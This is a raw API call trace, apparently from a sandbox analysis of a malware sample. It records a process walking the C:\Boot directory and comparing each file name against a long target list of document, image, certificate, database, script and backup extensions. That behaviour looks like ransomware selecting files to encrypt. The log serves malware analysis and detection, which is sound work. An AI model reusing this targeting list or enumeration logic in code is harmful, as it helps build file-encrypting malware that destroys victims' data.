lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0286.247] lstrlenW (lpString=".myd") returned 4 [0286.247] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0286.247] lstrlenW (lpString=".myi") returned 4 [0286.248] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0286.248] lstrlenW (lpString=".nef") returned 4 [0286.248] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0286.248] lstrlenW (lpString=".nrw") returned 4 [0286.248] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0286.248] lstrlenW (lpString=".obj") returned 4 [0286.248] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0286.248] lstrlenW (lpString=".odb") returned 4 [0286.248] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0286.248] lstrlenW (lpString=".odc") returned 4 [0286.248] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0286.248] lstrlenW (lpString=".odm") returned 4 [0286.248] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0286.248] lstrlenW (lpString=".odp") returned 4 [0286.248] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0286.248] lstrlenW (lpString=".ods") returned 4 [0286.248] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0286.248] lstrlenW (lpString=".oft") returned 4 [0286.248] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0286.248] lstrlenW (lpString=".one") returned 4 [0286.248] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0286.248] lstrlenW (lpString=".onepkg") returned 7 [0286.248] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0286.248] lstrlenW (lpString=".onetoc2") returned 8 [0286.248] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0286.248] lstrlenW (lpString=".opt") returned 4 [0286.248] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0286.249] lstrlenW (lpString=".oqy") returned 4 [0286.249] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0286.249] lstrlenW (lpString=".orf") returned 4 [0286.249] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0286.249] lstrlenW (lpString=".p12") returned 4 [0286.249] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0286.249] lstrlenW (lpString=".p7b") returned 4 [0286.249] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0286.249] lstrlenW (lpString=".p7c") returned 4 [0286.249] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0286.249] lstrlenW (lpString=".pam") returned 4 [0286.249] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0286.249] lstrlenW (lpString=".pbm") returned 4 [0286.249] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0286.249] lstrlenW (lpString=".pct") returned 4 [0286.249] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0286.249] lstrlenW (lpString=".pcx") returned 4 [0286.249] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0286.249] lstrlenW (lpString=".pdd") returned 4 [0286.249] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0286.249] lstrlenW (lpString=".pdf") returned 4 [0286.249] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0286.249] lstrlenW (lpString=".pdp") returned 4 [0286.249] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0286.249] lstrlenW (lpString=".pef") returned 4 [0286.249] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0286.249] lstrlenW (lpString=".pem") returned 4 [0286.250] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0286.250] lstrlenW (lpString=".pff") returned 4 [0286.250] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0286.250] lstrlenW (lpString=".pfm") returned 4 [0286.250] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0286.250] lstrlenW (lpString=".pfx") returned 4 [0286.250] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0286.250] lstrlenW (lpString=".pgm") returned 4 [0286.250] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0286.250] lstrlenW (lpString=".php") returned 4 [0286.250] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0286.250] lstrlenW (lpString=".php3") returned 5 [0286.250] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0286.250] lstrlenW (lpString=".php4") returned 5 [0286.250] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0286.250] lstrlenW (lpString=".php5") returned 5 [0286.250] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0286.250] lstrlenW (lpString=".phtml") returned 6 [0286.250] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0286.250] lstrlenW (lpString=".pict") returned 5 [0286.250] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0286.250] lstrlenW (lpString=".pl") returned 3 [0286.250] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0286.250] lstrlenW (lpString=".pls") returned 4 [0286.250] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0286.250] lstrlenW (lpString=".pm") returned 3 [0286.250] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0286.250] lstrlenW (lpString=".png") returned 4 [0286.250] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0286.250] lstrlenW (lpString=".pnm") returned 4 [0286.250] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0286.251] lstrlenW (lpString=".pot") returned 4 [0286.251] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0286.251] lstrlenW (lpString=".potm") returned 5 [0286.251] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0286.251] lstrlenW (lpString=".potx") returned 5 [0286.251] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0286.251] lstrlenW (lpString=".ppa") returned 4 [0286.251] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0286.251] lstrlenW (lpString=".ppam") returned 5 [0286.251] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0286.251] lstrlenW (lpString=".ppm") returned 4 [0286.251] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0286.251] lstrlenW (lpString=".pps") returned 4 [0286.251] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0286.251] lstrlenW (lpString=".ppsm") returned 5 [0286.251] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0286.251] lstrlenW (lpString=".ppt") returned 4 [0286.251] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0286.251] lstrlenW (lpString=".pptm") returned 5 [0286.251] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0286.251] lstrlenW (lpString=".pptx") returned 5 [0286.251] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0286.251] lstrlenW (lpString=".prn") returned 4 [0286.251] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0286.251] lstrlenW (lpString=".ps") returned 3 [0286.251] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0286.251] lstrlenW (lpString=".psb") returned 4 [0286.251] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0286.251] lstrlenW (lpString=".psd") returned 4 [0286.251] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0286.251] lstrlenW (lpString=".pst") returned 4 [0286.251] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0286.252] lstrlenW (lpString=".ptx") returned 4 [0286.252] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0286.252] lstrlenW (lpString=".pub") returned 4 [0286.252] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0286.252] lstrlenW (lpString=".pwm") returned 4 [0286.252] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0286.252] lstrlenW (lpString=".pxr") returned 4 [0286.252] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0286.252] lstrlenW (lpString=".py") returned 3 [0286.252] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0286.252] lstrlenW (lpString=".qt") returned 3 [0286.252] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0286.252] lstrlenW (lpString=".r3d") returned 4 [0286.252] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0286.252] lstrlenW (lpString=".raf") returned 4 [0286.252] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0286.252] lstrlenW (lpString=".rar") returned 4 [0286.252] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0286.252] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ed6c6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf300233f, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0286.252] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ed6c6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf300233f, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0286.252] FindClose (in: hFindFile=0x3947d68 | out: hFindFile=0x3947d68) returned 1 [0286.253] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0286.253] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0286.253] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0286.253] lstrlenW (lpString="C:\\Boot\\ko-KR") returned 13 [0286.253] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39483a8 [0286.253] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.253] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211c6af1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0286.253] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0286.253] lstrlenW (lpString=".1cd") returned 4 [0286.253] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0286.253] lstrlenW (lpString=".3ds") returned 4 [0286.253] lstrcmpiW (lpString1=".3ds", lpString2=".mui") returned -1 [0286.253] lstrlenW (lpString=".3fr") returned 4 [0286.254] lstrcmpiW (lpString1=".3fr", lpString2=".mui") returned -1 [0286.254] lstrlenW (lpString=".3g2") returned 4 [0286.254] lstrcmpiW (lpString1=".3g2", lpString2=".mui") returned -1 [0286.254] lstrlenW (lpString=".3gp") returned 4 [0286.254] lstrcmpiW (lpString1=".3gp", lpString2=".mui") returned -1 [0286.254] lstrlenW (lpString=".7z") returned 3 [0286.254] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0286.254] lstrlenW (lpString=".accda") returned 6 [0286.254] lstrcmpiW (lpString1=".accda", lpString2="xe.mui") returned -1 [0286.254] lstrlenW (lpString=".accdb") returned 6 [0286.254] lstrcmpiW (lpString1=".accdb", lpString2="xe.mui") returned -1 [0286.254] lstrlenW (lpString=".accdc") returned 6 [0286.254] lstrcmpiW (lpString1=".accdc", lpString2="xe.mui") returned -1 [0286.254] lstrlenW (lpString=".accde") returned 6 [0286.254] lstrcmpiW (lpString1=".accde", lpString2="xe.mui") returned -1 [0286.254] lstrlenW (lpString=".accdt") returned 6 [0286.254] lstrcmpiW (lpString1=".accdt", lpString2="xe.mui") returned -1 [0286.254] lstrlenW (lpString=".accdw") returned 6 [0286.254] lstrcmpiW (lpString1=".accdw", lpString2="xe.mui") returned -1 [0286.254] lstrlenW (lpString=".adb") returned 4 [0286.254] lstrcmpiW (lpString1=".adb", lpString2=".mui") returned -1 [0286.254] lstrlenW (lpString=".adp") returned 4 [0286.254] lstrcmpiW (lpString1=".adp", lpString2=".mui") returned -1 [0286.254] lstrlenW (lpString=".ai") returned 3 [0286.254] lstrcmpiW (lpString1=".ai", lpString2="mui") returned -1 [0286.254] lstrlenW (lpString=".ai3") returned 4 [0286.254] lstrcmpiW (lpString1=".ai3", lpString2=".mui") returned -1 [0286.254] lstrlenW (lpString=".ai4") returned 4 [0286.254] lstrcmpiW (lpString1=".ai4", lpString2=".mui") returned -1 [0286.254] lstrlenW (lpString=".ai5") returned 4 [0286.254] lstrcmpiW (lpString1=".ai5", lpString2=".mui") returned -1 [0286.254] lstrlenW (lpString=".ai6") returned 4 [0286.254] lstrcmpiW (lpString1=".ai6", lpString2=".mui") returned -1 [0286.254] lstrlenW (lpString=".ai7") returned 4 [0286.254] lstrcmpiW (lpString1=".ai7", lpString2=".mui") returned -1 [0286.254] lstrlenW (lpString=".ai8") returned 4 [0286.255] lstrcmpiW (lpString1=".ai8", lpString2=".mui") returned -1 [0286.255] lstrlenW (lpString=".anim") returned 5 [0286.255] lstrcmpiW (lpString1=".anim", lpString2="e.mui") returned -1 [0286.255] lstrlenW (lpString=".arw") returned 4 [0286.255] lstrcmpiW (lpString1=".arw", lpString2=".mui") returned -1 [0286.255] lstrlenW (lpString=".as") returned 3 [0286.255] lstrcmpiW (lpString1=".as", lpString2="mui") returned -1 [0286.255] lstrlenW (lpString=".asa") returned 4 [0286.255] lstrcmpiW (lpString1=".asa", lpString2=".mui") returned -1 [0286.255] lstrlenW (lpString=".asc") returned 4 [0286.255] lstrcmpiW (lpString1=".asc", lpString2=".mui") returned -1 [0286.255] lstrlenW (lpString=".ascx") returned 5 [0286.255] lstrcmpiW (lpString1=".ascx", lpString2="e.mui") returned -1 [0286.255] lstrlenW (lpString=".asm") returned 4 [0286.255] lstrcmpiW (lpString1=".asm", lpString2=".mui") returned -1 [0286.255] lstrlenW (lpString=".asmx") returned 5 [0286.255] lstrcmpiW (lpString1=".asmx", lpString2="e.mui") returned -1 [0286.255] lstrlenW (lpString=".asp") returned 4 [0286.255] lstrcmpiW (lpString1=".asp", lpString2=".mui") returned -1 [0286.255] lstrlenW (lpString=".aspx") returned 5 [0286.255] lstrcmpiW (lpString1=".aspx", lpString2="e.mui") returned -1 [0286.255] lstrlenW (lpString=".asr") returned 4 [0286.255] lstrcmpiW (lpString1=".asr", lpString2=".mui") returned -1 [0286.255] lstrlenW (lpString=".asx") returned 4 [0286.255] lstrcmpiW (lpString1=".asx", lpString2=".mui") returned -1 [0286.255] lstrlenW (lpString=".avi") returned 4 [0286.255] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0286.255] lstrlenW (lpString=".avs") returned 4 [0286.255] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0286.255] lstrlenW (lpString=".backup") returned 7 [0286.255] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0286.255] lstrlenW (lpString=".bak") returned 4 [0286.255] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0286.255] lstrlenW (lpString=".bay") returned 4 [0286.255] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0286.255] lstrlenW (lpString=".bd") returned 3 [0286.256] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0286.256] lstrlenW (lpString=".bin") returned 4 [0286.256] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0286.256] lstrlenW (lpString=".bmp") returned 4 [0286.256] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0286.256] lstrlenW (lpString=".bz2") returned 4 [0286.256] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0286.256] lstrlenW (lpString=".c") returned 2 [0286.256] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0286.256] lstrlenW (lpString=".cdr") returned 4 [0286.256] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0286.256] lstrlenW (lpString=".cer") returned 4 [0286.256] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0286.256] lstrlenW (lpString=".cf") returned 3 [0286.256] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0286.256] lstrlenW (lpString=".cfc") returned 4 [0286.256] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0286.256] lstrlenW (lpString=".cfm") returned 4 [0286.256] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0286.256] lstrlenW (lpString=".cfml") returned 5 [0286.256] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0286.308] lstrlenW (lpString=".cfu") returned 4 [0286.308] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0286.308] lstrlenW (lpString=".chm") returned 4 [0286.308] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0286.308] lstrlenW (lpString=".cin") returned 4 [0286.308] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0286.308] lstrlenW (lpString=".class") returned 6 [0286.308] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0286.308] lstrlenW (lpString=".clx") returned 4 [0286.308] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0286.308] lstrlenW (lpString=".config") returned 7 [0286.308] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0286.308] lstrlenW (lpString=".cpp") returned 4 [0286.309] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0286.309] lstrlenW (lpString=".cr2") returned 4 [0286.309] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0286.309] lstrlenW (lpString=".crt") returned 4 [0286.309] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0286.309] lstrlenW (lpString=".crw") returned 4 [0286.309] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0286.309] lstrlenW (lpString=".cs") returned 3 [0286.309] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0286.309] lstrlenW (lpString=".css") returned 4 [0286.309] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0286.309] lstrlenW (lpString=".csv") returned 4 [0286.309] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0286.309] lstrlenW (lpString=".cub") returned 4 [0286.309] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0286.309] lstrlenW (lpString=".dae") returned 4 [0286.309] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0286.309] lstrlenW (lpString=".dat") returned 4 [0286.309] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0286.309] lstrlenW (lpString=".db") returned 3 [0286.309] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0286.309] lstrlenW (lpString=".dbf") returned 4 [0286.309] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0286.309] lstrlenW (lpString=".dbx") returned 4 [0286.309] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0286.309] lstrlenW (lpString=".dc3") returned 4 [0286.309] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0286.309] lstrlenW (lpString=".dcm") returned 4 [0286.309] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0286.309] lstrlenW (lpString=".dcr") returned 4 [0286.309] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0286.309] lstrlenW (lpString=".der") returned 4 [0286.309] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0286.309] lstrlenW (lpString=".dib") returned 4 [0286.309] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0286.309] lstrlenW (lpString=".dic") returned 4 [0286.309] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0286.310] lstrlenW (lpString=".dif") returned 4 [0286.310] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0286.310] lstrlenW (lpString=".divx") returned 5 [0286.310] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0286.310] lstrlenW (lpString=".djvu") returned 5 [0286.310] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0286.310] lstrlenW (lpString=".dng") returned 4 [0286.310] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0286.310] lstrlenW (lpString=".doc") returned 4 [0286.310] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0286.310] lstrlenW (lpString=".docm") returned 5 [0286.310] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0286.310] lstrlenW (lpString=".docx") returned 5 [0286.310] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0286.310] lstrlenW (lpString=".dot") returned 4 [0286.310] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0286.310] lstrlenW (lpString=".dotm") returned 5 [0286.310] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0286.310] lstrlenW (lpString=".dotx") returned 5 [0286.310] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0286.310] lstrlenW (lpString=".dpx") returned 4 [0286.310] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0286.310] lstrlenW (lpString=".dqy") returned 4 [0286.310] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0286.310] lstrlenW (lpString=".dsn") returned 4 [0286.310] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0286.310] lstrlenW (lpString=".dt") returned 3 [0286.310] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0286.310] lstrlenW (lpString=".dtd") returned 4 [0286.310] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0286.310] lstrlenW (lpString=".dwg") returned 4 [0286.310] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0286.310] lstrlenW (lpString=".dwt") returned 4 [0286.310] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0286.310] lstrlenW (lpString=".dx") returned 3 [0286.310] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0286.310] lstrlenW (lpString=".dxf") returned 4 [0286.311] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0286.311] lstrlenW (lpString=".edml") returned 5 [0286.311] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0286.311] lstrlenW (lpString=".efd") returned 4 [0286.311] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0286.311] lstrlenW (lpString=".elf") returned 4 [0286.311] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0286.311] lstrlenW (lpString=".emf") returned 4 [0286.311] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0286.311] lstrlenW (lpString=".emz") returned 4 [0286.311] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0286.311] lstrlenW (lpString=".epf") returned 4 [0286.311] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0286.311] lstrlenW (lpString=".eps") returned 4 [0286.311] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0286.311] lstrlenW (lpString=".epsf") returned 5 [0286.311] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0286.311] lstrlenW (lpString=".epsp") returned 5 [0286.311] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0286.311] lstrlenW (lpString=".erf") returned 4 [0286.311] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0286.311] lstrlenW (lpString=".exr") returned 4 [0286.311] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0286.311] lstrlenW (lpString=".f4v") returned 4 [0286.311] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0286.311] lstrlenW (lpString=".fido") returned 5 [0286.311] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0286.311] lstrlenW (lpString=".flm") returned 4 [0286.311] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0286.311] lstrlenW (lpString=".flv") returned 4 [0286.311] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0286.311] lstrlenW (lpString=".frm") returned 4 [0286.311] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0286.311] lstrlenW (lpString=".fxg") returned 4 [0286.311] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0286.311] lstrlenW (lpString=".geo") returned 4 [0286.312] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0286.312] lstrlenW (lpString=".gif") returned 4 [0286.312] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0286.312] lstrlenW (lpString=".grs") returned 4 [0286.312] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0286.312] lstrlenW (lpString=".gz") returned 3 [0286.312] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0286.312] lstrlenW (lpString=".h") returned 2 [0286.312] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0286.312] lstrlenW (lpString=".hdr") returned 4 [0286.312] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0286.312] lstrlenW (lpString=".hpp") returned 4 [0286.312] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0286.312] lstrlenW (lpString=".hta") returned 4 [0286.312] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0286.312] lstrlenW (lpString=".htc") returned 4 [0286.312] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0286.312] lstrlenW (lpString=".htm") returned 4 [0286.312] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0286.312] lstrlenW (lpString=".html") returned 5 [0286.312] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0286.312] lstrlenW (lpString=".icb") returned 4 [0286.312] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0286.312] lstrlenW (lpString=".ics") returned 4 [0286.312] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0286.312] lstrlenW (lpString=".iff") returned 4 [0286.312] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0286.312] lstrlenW (lpString=".inc") returned 4 [0286.312] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0286.312] lstrlenW (lpString=".indd") returned 5 [0286.312] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0286.312] lstrlenW (lpString=".ini") returned 4 [0286.312] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0286.312] lstrlenW (lpString=".iqy") returned 4 [0286.312] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0286.312] lstrlenW (lpString=".j2c") returned 4 [0286.313] 